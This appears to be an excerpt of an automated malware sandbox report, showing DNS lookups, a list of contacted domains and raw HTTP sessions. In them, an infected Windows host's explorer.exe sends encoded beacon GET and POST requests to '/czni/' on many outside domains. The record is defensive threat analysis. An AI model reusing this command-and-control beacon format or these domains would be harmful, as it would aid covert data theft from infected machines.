                                                                          Jan 30, 2023 13:41:46.566090107 CET8.8.8.8192.168.2.50x35efNo error (0)www.arritalvigo.com217.160.0.94A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:41:54.342660904 CET8.8.8.8192.168.2.50x7692No error (0)www.versusfinances.tech67.215.9.138A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:07.295037985 CET8.8.8.8192.168.2.50x2470No error (0)www.hayethe.site185.104.28.238A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:14.943119049 CET8.8.8.8192.168.2.50x3ec8No error (0)www.octohoki.net172.67.179.191A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:14.943119049 CET8.8.8.8192.168.2.50x3ec8No error (0)www.octohoki.net104.21.59.151A (IP address)IN (0x0001)false
                                                                          Jan 30, 2023 13:42:23.067003965 CET8.8.8.8192.168.2.50x5af6No error (0)www.hougou.ru87.236.16.153A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • hirosguide.hu
                                                                          • www.panalobet88.net
                                                                          • www.toporsche.online
                                                                          • www.chimid.org
                                                                          • www.genuineinsights.cloud
                                                                          • www.44yyds.com
                                                                          • www.yeah-go.com
                                                                          • www.frogair.online
                                                                          • www.deglaz.xyz
                                                                          • www.laylaroseuk.com
                                                                          • www.lakeviewautomation.com
                                                                          • www.dellaone.com
                                                                          • www.arritalvigo.com
                                                                          • www.versusfinances.tech
                                                                          • www.hayethe.site
                                                                          • www.octohoki.net
                                                                          • www.hougou.ru

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.54970391.227.138.48443C:\Windows\System32\wscript.exe
                                                                          TimestampkBytes transferredDirectionData


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.54970714.128.47.12680C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:39:50.282717943 CET745OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=fBMxo69x1QXNWuc9hyM7d4IFsS8MYdi4DQWD1kEEyFhAPfH6LtWDKNH9q/ewbXUtBA348B3g5uC8JLGqihwz/XjbfKo4x0QdAA== HTTP/1.1
                                                                          Host: www.panalobet88.net
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:39:50.565773010 CET745INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:39:50 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          10192.168.2.54971923.227.38.7480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:48.549119949 CET799OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.yeah-go.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.yeah-go.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.yeah-go.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 41 44 7a 72 59 35 6d 5a 6e 6e 6d 41 7e 6f 76 71 49 49 50 4b 33 5a 72 50 38 73 49 63 59 64 6e 36 65 6b 46 53 46 38 71 71 6e 46 52 58 68 70 6a 44 47 66 55 76 71 39 31 39 51 51 33 59 47 4e 48 62 41 30 59 65 30 75 4a 49 34 41 33 31 6d 53 5a 76 72 57 61 5f 55 4d 31 51 32 52 41 6a 34 39 49 47 7a 47 51 37 62 30 39 4d 72 34 41 56 6d 62 44 6d 53 6c 4c 72 45 72 61 78 48 77 28 51 5a 6f 38 68 73 53 72 67 67 4c 7a 4b 38 32 76 52 37 64 73 68 46 65 4d 79 4d 65 76 53 53 64 54 76 5a 57 69 48 72 54 39 33 32 74 52 39 56 38 30 5f 6d 6a 44 45 55 67 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=ADzrY5mZnnmA~ovqIIPK3ZrP8sIcYdn6ekFSF8qqnFRXhpjDGfUvq919QQ3YGNHbA0Ye0uJI4A31mSZvrWa_UM1Q2RAj49IGzGQ7b09Mr4AVmbDmSlLrEraxHw(QZo8hsSrggLzK82vR7dshFeMyMevSSdTvZWiHrT932tR9V80_mjDEUg).
                                                                          Jan 30, 2023 13:40:48.837980986 CET800INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:48 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Sorting-Hat-PodId: 315
                                                                          X-Sorting-Hat-ShopId: 71134478652
                                                                          Vary: Accept-Encoding
                                                                          Vary: Accept
                                                                          X-Frame-Options: DENY
                                                                          X-ShopId: 71134478652
                                                                          X-ShardId: 315
                                                                          X-Shopify-Generated-Cart-Token: 21c7ae2ca548800573490a93ab93ff69
                                                                          Content-Language: pt-BR
                                                                          Cache-Control: no-store
                                                                          Set-Cookie: localization=BR; path=/; expires=Tue, 30 Jan 2024 12:40:48 GMT; SameSite=Lax
                                                                          Set-Cookie: cart_sig=3daa84b1ccd12f91044bf3d820ae05bb; path=/; expires=Mon, 13 Feb 2023 12:40:48 GMT; HttpOnly; SameSite=Lax
                                                                          Set-Cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22merchant_geo%22%3A%22BR%22%2C%22sale_of_data_region%22%3Afalse%7D; domain=yeah-go.com; path=/; expires=Tue, 31 Jan 2023 12:40:48 GMT; SameSite=Lax
                                                                          Set-Cookie: _y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12:40:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
                                                                          Set-Cookie: _s=6d163f85-2949-4a42-b4ce-e10617e163d7; Expires=Mon, 30-Jan-23 13:10:48 GMT; Domain=yeah-go.com; Path=/; SameSite=Lax
                                                                          Set-Cookie: _shopify_y=4b96e5d2-3055-4f89-a324-3dc0f29e3023; Expires=Tue, 30-Jan-24 12
                                                                          Data Raw:
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:48.838023901 CET802INData Raw: 34 30 3a 34 38 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 79 65 61 68 2d 67 6f 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 73 68 6f 70 69 66 79 5f 73 3d 36 64 31 36 33 66
                                                                          Data Ascii: 40:48 GMT; Domain=yeah-go.com; Path=/; SameSite=LaxSet-Cookie: _shopify_s=6d163f85-2949-4a42-b4ce-e10617e163d7; Expires=Mon, 30-Jan-23 13:10:48 GMT; Domain=yeah-go.com; Path=/; SameSite=LaxX-Shopify-Stage: productionContent-Security-Poli
                                                                          Jan 30, 2023 13:40:48.838042021 CET802INData Raw: 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 31 35 38 38 2e 39 39 39 39 38 37 0d 0a 53 65 72 76 65 72 3a 20
                                                                          Data Ascii: nel","max_age":604800}Server-Timing: cfRequestDuration;dur=1588.999987Server: cloudflareCF-RAY: 791a47377fe39235-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Jan 30, 2023 13:40:48.838064909 CET803INData Raw: 36 38 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 eb 6e db 36 14 fe df a7 e0 54 0c e8 06 dd 29 5b b6 2a a7 eb b2 6c fb 91 ae 05 3a 0c d8 fe d1 12 6d 71 91 45 8d a2 e3 a4 43 81 bd c3 9e 60 d8 a3 ec 4d f6 24 3b 24 45 59 4a ec 76 4d d0 98 97 73 fd
                                                                          Data Ascii: 68fXn6T)[*l:mqEC`M$;$EYJvMs??BOrjlWmu@Iy|G%AEEDG{L"y`#A!m@bCo>2;y_S$[NE6w"[UK5[vw^#CN
                                                                          Jan 30, 2023 13:40:48.838083982 CET804INData Raw: 77 f3 c8 c5 18 32 db c7 66 75 0d 37 38 51 67 97 a1 8f 17 c0 88 11 68 c1 cb 99 65 0a fd 38 06 09 46 de f5 c4 ac e9 ee 17 47 27 e2 5b 9d 80 e3 54 7c 7a b5 fc fa 0a ab 14 31 57 ba f5 ae 9c 78 38 50 8f cd af 9c 41 95 e9 e9 d6 b9 c8 03 85 c3 c7 41 02
                                                                          Data Ascii: w2fu78Qghe8FG'[T|z1Wx8PAA/]\n0`/!8cjmVD 0R-G/.xkA[U_9vN5|,&@+ZO<"q#x\n'mcU<?=G,G<n
                                                                          Jan 30, 2023 13:40:48.838104010 CET804INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          11192.168.2.54972023.227.38.7480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:51.433516979 CET805OUTGET /czni/?z8rul-n=NBbLbMKCnleo0bnLNJr7y57f08wHeLbsflpVfs6UmX5SvZLxN88Gw8EeREzrIsvGXit/2Ohq43fDpUBAiFCfWP8z8U1D0vMs/Q==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.yeah-go.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:40:51.482328892 CET806INHTTP/1.1 403 Forbidden
                                                                          Date: Mon, 30 Jan 2023 12:40:51 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 315
                                                                          X-Sorting-Hat-ShopId: 71134478652
                                                                          X-Dc: gcp-europe-west3
                                                                          X-Request-ID: aca3630a-5f6f-4e43-87f3-b653ec267e18
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wvle4kgU20ZKzDTCZqnGDCg84KaskuIHELm853b%2FgasafBl0arBl%2FEvQXlSfKid125VO3dam81P%2B4h%2BU%2B9doD56%2BtDqU3pv4DJqkUuD6M0tOjSjy7t19uWYDuv1mXzEFCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                          Server-Timing: cfRequestDuration;dur=69.000006
                                                                          Server: cloudflare
                                                                          CF-RAY: 791a47497b3f6933-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;
                                                                          Jan 30, 2023 13:40:51.482367039 CET807INData Raw: 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d
                                                                          Data Ascii: min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;fo
                                                                          Jan 30, 2023 13:40:51.482403040 CET809INData Raw: 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 44 75 20 68 61 72 20 69 6b 6b 65 20 74 69 6c 6c 61 74 65 6c 73 65 20 74 69 6c 20 c3 a5 20 c3 a5 70 6e 65 20 64 65 74 74 65 20 6e 65 74 74 73 74 65 64 65 74 22 0a 20 20 7d 2c 0a 20
                                                                          Data Ascii: "content-title": "Du har ikke tillatelse til pne dette nettstedet" }, "th": { "title": "", "content-title": "
                                                                          Jan 30, 2023 13:40:51.482423067 CET810INData Raw: 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 6e 20 68 61 69 20 6c e2 80 99 61 75 74 6f 72 69 7a 7a 61 7a 69 6f 6e 65 20 70 65 72 20 61 63 63 65 64 65 72 65 20 61 20 71 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 70 6c
                                                                          Data Ascii: ent-title": "Non hai lautorizzazione per accedere a questo sito web" }, "pl": { "title": "Odmowa dostpu", "content-title": "Nie masz uprawnie dostpu do tej strony internetowej" }, "sv": { "title": "tkomst nekad",
                                                                          Jan 30, 2023 13:40:51.482443094 CET811INData Raw: 73 69 74 65 73 69 6e 65 20 65 72 69 c5 9f 69 6d 20 69 7a 6e 69 6e 69 7a 20 79 6f 6b 2e 22 0a 20 20 7d 2c 0a 20 20 22 7a 68 2d 43 4e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e8 ae bf e9 97 ae e8 a2 ab e6 8b 92 e7 bb 9d 22 2c 0a 20
                                                                          Data Ascii: sitesine eriim izniniz yok." }, "zh-CN": { "title": "", "content-title": "" }, "nl": { "title": "Toegang geweigerd", "content-title": "Je hebt geen toestemming voor toegang tot d
                                                                          Jan 30, 2023 13:40:51.482459068 CET811INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          12192.168.2.54972181.169.145.7280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:57.735447884 CET812OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.frogair.online
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.frogair.online
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.frogair.online/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 30 71 35 6e 58 6b 7e 59 61 72 28 4b 64 63 75 30 36 71 53 41 68 73 49 34 37 4c 31 57 30 5f 53 73 7a 4e 7a 58 4a 71 7a 6d 61 35 51 55 34 42 41 58 4e 69 51 7a 31 31 43 72 53 4a 4b 56 71 58 51 51 49 4e 77 58 68 44 46 4b 34 62 43 34 70 7a 5a 79 46 38 43 56 77 6e 28 72 79 37 52 4b 4c 61 78 44 42 56 6e 46 4f 4d 32 64 76 43 4f 57 45 57 76 36 57 45 4c 48 55 70 50 57 36 64 51 6b 50 62 78 4e 74 63 6e 64 50 4e 44 6b 74 75 31 52 65 57 36 4a 42 6d 35 2d 47 38 78 41 35 75 49 74 56 50 77 6d 28 73 56 71 4f 67 4d 67 70 72 59 31 7e 4e 6d 44 6d 51 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=0q5nXk~Yar(Kdcu06qSAhsI47L1W0_SszNzXJqzma5QU4BAXNiQz11CrSJKVqXQQINwXhDFK4bC4pzZyF8CVwn(ry7RKLaxDBVnFOM2dvCOWEWv6WELHUpPW6dQkPbxNtcndPNDktu1ReW6JBm5-G8xA5uItVPwm(sVqOgMgprY1~NmDmQ).
                                                                          Jan 30, 2023 13:40:57.756314993 CET813INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:40:57 GMT
                                                                          Server: Apache/2.4.54 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          13192.168.2.54972281.169.145.7280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:00.276262045 CET813OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=5oRHUQDtYJ3jH+KiyYuXif0R6NF655imjfvnRa6lV5c+zSwVFD4ch3jkTam3ow4RLLhVoDNP5tCGnm9XMNb3kyjT9rM2PcJgOg== HTTP/1.1
                                                                          Host: www.frogair.online
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:00.297307968 CET814INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:00 GMT
                                                                          Server: Apache/2.4.54 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          14192.168.2.549723199.192.28.12180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:05.966979027 CET815OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.deglaz.xyz
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.deglaz.xyz
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.deglaz.xyz/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 28 36 50 36 51 52 65 45 37 39 53 4a 42 6d 43 75 4c 4e 73 46 4d 36 56 57 68 6d 7e 61 67 52 52 57 46 55 42 37 69 4c 73 5a 54 38 77 53 6d 57 65 55 74 46 38 79 51 37 32 43 38 6a 6e 75 79 72 65 6f 30 78 66 35 65 58 68 53 70 77 4d 73 28 77 63 53 67 4c 64 63 57 34 6e 54 45 37 76 38 54 38 42 49 32 62 70 44 7a 7a 45 4e 51 34 63 58 53 64 53 42 50 4b 4b 30 6c 39 4e 63 35 44 57 32 52 45 4a 56 53 4d 5a 33 6e 4e 66 6e 4d 33 62 53 71 33 61 53 6e 71 48 7a 75 42 6e 59 36 53 77 57 75 6e 72 47 75 67 47 67 74 6d 43 54 75 58 33 38 65 61 68 56 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=(6P6QReE79SJBmCuLNsFM6VWhm~agRRWFUB7iLsZT8wSmWeUtF8yQ72C8jnuyreo0xf5eXhSpwMs(wcSgLdcW4nTE7v8T8BI2bpDzzENQ4cXSdSBPKK0l9Nc5DW2REJVSMZ3nNfnM3bSq3aSnqHzuBnY6SwWunrGugGgtmCTuX38eahVXQ).
                                                                          Jan 30, 2023 13:41:06.251538992 CET816INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:06 GMT
                                                                          Server: Apache
                                                                          Content-Length: 16026
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 63 2d 31 2e 32 34 37 2c 34 2e 36 35 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 